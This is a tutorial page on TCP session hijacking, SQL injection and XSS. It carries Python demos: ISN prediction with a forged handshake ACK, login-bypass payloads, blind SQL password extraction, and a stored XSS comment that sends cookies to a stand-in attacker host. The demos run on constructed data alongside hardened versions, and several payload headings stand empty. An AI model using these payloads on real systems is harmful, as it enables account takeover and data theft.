Before understanding session hijacking, we first need to understand what a session is.
A session is a semi-permanent interactive information interchange, also known as a dialogue, a conversation or a meeting, between two or more communicating devices, or between a computer and a user.
Sessions are generally needed to ease authenticated communication between two or more parties: because the session exists, the nodes do not have to authenticate again for every activity or action.
TCP hijacking is the oldest type of session hijacking. It relies on successfully predicting the initial sequence numbers (ISNs) that are exchanged between two hosts, a client and a server.
Sequence numbers are exchanged during the TCP three-way handshake.
So if attackers manage to predict the initial sequence number, they can send the final ACK packet of the handshake to the server while spoofing the original host, and from there hijack the TCP connection.
Before predicting the initial sequence number of a TCP three-way handshake, attackers need to get between the client and the server in order to hijack the TCP connection successfully; for this, an attacker can use the following three techniques.
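As an added example (not code from the original page), the prediction step and the forged third packet of the handshake in Python. The sampled ISN values are constructed to mimic an old stack that bumps the ISN by a fixed amount per connection; the port numbers and the client ISN are made up, and the TCP checksum is left at zero because it needs the IP pseudo-header that a raw-socket sender would supply.

```python
import struct

# Constructed sample: ISNs sampled from three successive connections the
# attacker opened to the target server. Old BSD-derived stacks bumped the ISN
# by a fixed amount per connection, which is the weakness this prediction uses.
PREDICTABLE_ISNS = [0x0001F400, 0x0002EE00, 0x0003E800]
# Constructed sample of a stack that randomises its ISNs (no usable pattern).
RANDOM_ISNS = [0x8F3A21C7, 0x1D9E0B54, 0xA6C47E02]

ACK_FLAG = 0x10


def predict_next_isn(observed):
    """Predict the next ISN when the observed ones grow by a constant step.

    Returns None when the increments differ, i.e. when the ISNs look random
    and a blind spoofing attack cannot pick a valid acknowledgement number.
    """
    if len(observed) < 2:
        return None
    steps = {(b - a) & 0xFFFFFFFF for a, b in zip(observed, observed[1:])}
    if len(steps) != 1:
        return None
    return (observed[-1] + steps.pop()) & 0xFFFFFFFF


def tcp_header(src_port, dst_port, seq, ack, flags, window=65535):
    """Pack a minimal 20-byte TCP header (no options). The checksum is left
    at zero: it depends on the IP pseudo-header that a raw-socket sender
    would add, and this example only builds the TCP fields."""
    data_offset = 5  # header length in 32-bit words
    offset_flags = (data_offset << 12) | flags
    return struct.pack("!HHIIHHHH", src_port, dst_port, seq, ack,
                       offset_flags, window, 0, 0)


def forged_handshake_ack(client_isn, server_isn_guess, src_port, dst_port):
    """Third packet of the three-way handshake, built as the spoofed client:
    it acknowledges the server's SYN-ACK without ever having seen it."""
    return tcp_header(src_port, dst_port,
                      seq=(client_isn + 1) & 0xFFFFFFFF,
                      ack=(server_isn_guess + 1) & 0xFFFFFFFF,
                      flags=ACK_FLAG)


def parse_tcp_header(raw):
    """Unpack a 20-byte TCP header into a dict (used to inspect the forged packet)."""
    src, dst, seq, ack, offset_flags, window, _checksum, _urgent = struct.unpack(
        "!HHIIHHHH", raw[:20])
    return {"src_port": src, "dst_port": dst, "seq": seq, "ack": ack,
            "flags": offset_flags & 0x1FF, "window": window}


if __name__ == "__main__":
    guess = predict_next_isn(PREDICTABLE_ISNS)
    print("predicted server ISN:", hex(guess))
    # Made-up client ISN and ports for the demonstration.
    pkt = forged_handshake_ack(client_isn=0x11223344, server_isn_guess=guess,
                               src_port=40000, dst_port=23)
    print(parse_tcp_header(pkt))
    print("prediction against a randomising stack:", predict_next_isn(RANDOM_ISNS))
```

Two caveats a practitioner should keep in mind: stacks that follow RFC 6528 choose ISNs with a keyed hash, so predict_next_isn returns None against them, and the legitimate client will answer the SYN-ACK it never asked for with a RST unless the attacker has first silenced it, which is why the text stresses getting between the two hosts.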
SQL, which stands for Structured Query Language, is a database language designed to manage data in relational database management systems (RDBMS).
1. The user provides input to the web application.
2. The web application accepts the data from the user and processes it in an SQL query, as defined by the web script.
3. The web server generates an output for the user, depending on the script.
For example, we enter our login credentials in a login form and press Submit. The server takes the details and checks them against its user database. If authenticated, you are taken to the desired page.
During SQL injection, the user submits malicious input that forces the query (which is run by the login script in the backend) to perform an undesired action.
Unauthorized use of the web application: SQL injection commonly results in bypassing user authentication.
Apart from this, one can also:
To bypass authentication, use one of the following queries in the user input:
To guess a field name:
Based on the error produced, one can establish whether the field exists or not.
To guess a table name:
To delete a table:
To write a file:
To get a shell:
Blind SQL injection is used when a web application is vulnerable to SQL injection but the results of the injection are not visible to the attacker. The vulnerable page may not display data at all, but it renders differently depending on the result of a logical statement injected into the legitimate SQL statement for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.
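The login flow and the blind variant described above, as an added example that is not part of the original page: a Python script against an in-memory SQLite database (the users table, names and passwords are constructed). It shows the authentication bypass with the classic `admin'--` and `' OR '1'='1` payloads, the parameterised query that resists them, error-based field guessing, and boolean-based blind extraction that recovers a stored value one character at a time using only the yes/no behaviour of the login form.

```python
import sqlite3


def make_db():
    """Constructed sample: an in-memory users table standing in for the
    application's real user store."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cret!"), ("alice", "wonderland")])
    return db


def vulnerable_login(db, username, password):
    """The login script as the text describes it: user input is pasted straight
    into the query text, so quotes in the input change the query's meaning."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None


def safe_login(db, username, password):
    """Hardened form: bound parameters keep the input as data, so the same
    payloads are compared literally against the stored values and fail."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


def column_exists(db, column):
    """Error-based field guessing: referencing a column that does not exist
    makes the database throw an error, an existing one evaluates silently."""
    try:
        vulnerable_login(db, "' OR " + column + " IS NULL--", "")
        return True
    except sqlite3.OperationalError:
        return False


def make_oracle(db):
    """Turn the login form into a yes/no oracle: the injected condition is
    ORed into the WHERE clause and the rest of the query is commented out,
    so the login 'succeeds' exactly when the condition is true."""
    def oracle(condition):
        return vulnerable_login(db, "' OR (" + condition + ")--", "")
    return oracle


CHARSET = ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
           "0123456789!@#$%^&*_-")


def blind_extract(oracle, column, table, row_filter, max_len=32):
    """Boolean-based blind SQL injection: recover a string one character at a
    time using nothing but the oracle's true/false answers. Each position
    costs up to len(CHARSET) requests, which is why the technique is slow."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            condition = ("substr((SELECT " + column + " FROM " + table
                         + " WHERE " + row_filter + ")," + str(pos)
                         + ",1)='" + ch + "'")
            if oracle(condition):
                recovered += ch
                break
        else:
            break  # no character matched: end of the string
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("bypass with admin'--          :", vulnerable_login(db, "admin'--", "x"))
    print("bypass with ' OR '1'='1       :", vulnerable_login(db, "nobody", "' OR '1'='1"))
    print("same payload, parameterised   :", safe_login(db, "nobody", "' OR '1'='1"))
    print("column 'password' exists      :", column_exists(db, "password"))
    print("blind-extracted admin password:",
          blind_extract(make_oracle(db), "password", "users", "username='admin'"))
```

The oracle works because the vulnerable query collapses to `WHERE username = '' OR (condition)--`, so every row matches when the condition is true and none when it is false; the blind loop never sees the password, only that single bit per request.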
DOM Based (Type 0) XSS Vulnerabilities
Non-Persistent (Type 1) XSS Vulnerabilities
Generally, when combined with a social engineering attack (the victim is lured into following a crafted link), it can compromise user data.
In a sample scenario, consider this:
Persistent (Type 2) XSS Vulnerabilities
Consider a Scenario:
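As an added example not from the original page, a Python rendering of the persistent and non-persistent cases above: a forum page that concatenates stored comments, a search page that reflects its query parameter, and the escaped versions of both. The comments, the payload and the host name attacker.invalid are constructed; executes_script is a crude stand-in for the browser's parser. DOM-based XSS is not covered here, since it happens in client-side JavaScript rather than in server output.

```python
import html
import re

# Constructed sample: comments stored by a simple forum, one of which carries a
# script that ships each viewer's cookies to a host the attacker controls.
STORED_COMMENTS = [
    "Nice article, thanks!",
    '<script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>',
]

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def render_comments_vulnerable(comments):
    """Persistent (Type 2) XSS: stored comments are concatenated into the page
    unescaped, so every visitor's browser executes the injected script."""
    return "<ul>" + "".join("<li>" + c + "</li>" for c in comments) + "</ul>"


def render_comments_safe(comments):
    """Hardened form: html.escape turns <, >, & and quotes into entities, so
    the payload is displayed as text instead of being parsed as markup."""
    return "<ul>" + "".join("<li>" + html.escape(c, quote=True) + "</li>"
                             for c in comments) + "</ul>"


def render_search_vulnerable(query):
    """Non-persistent (Type 1) XSS: the search term from the URL is reflected
    into the page, so a crafted link sent to the victim carries the payload."""
    return '<p>Results for: <input value="' + query + '"></p>'


def render_search_safe(query):
    """Hardened form of the reflected case; quote=True matters because the
    value sits inside an attribute and a bare quote would close it."""
    return ('<p>Results for: <input value="'
            + html.escape(query, quote=True) + '"></p>')


def executes_script(markup):
    """Crude stand-in for the browser: does the rendered page contain a live
    <script> tag (rather than the escaped text &lt;script&gt;)?"""
    return SCRIPT_TAG.search(markup) is not None


if __name__ == "__main__":
    # Constructed reflected payload: closes the attribute, then injects a tag.
    reflected_payload = '"><script>alert(document.cookie)</script>'
    print("stored, vulnerable   :", executes_script(render_comments_vulnerable(STORED_COMMENTS)))
    print("stored, escaped      :", executes_script(render_comments_safe(STORED_COMMENTS)))
    print("reflected, vulnerable:", executes_script(render_search_vulnerable(reflected_payload)))
    print("reflected, escaped   :", executes_script(render_search_safe(reflected_payload)))
```

Escaping is context-dependent: html.escape is the right tool for text nodes and quoted attributes, but output placed inside a script block, a URL or an event handler needs the encoding for that context instead.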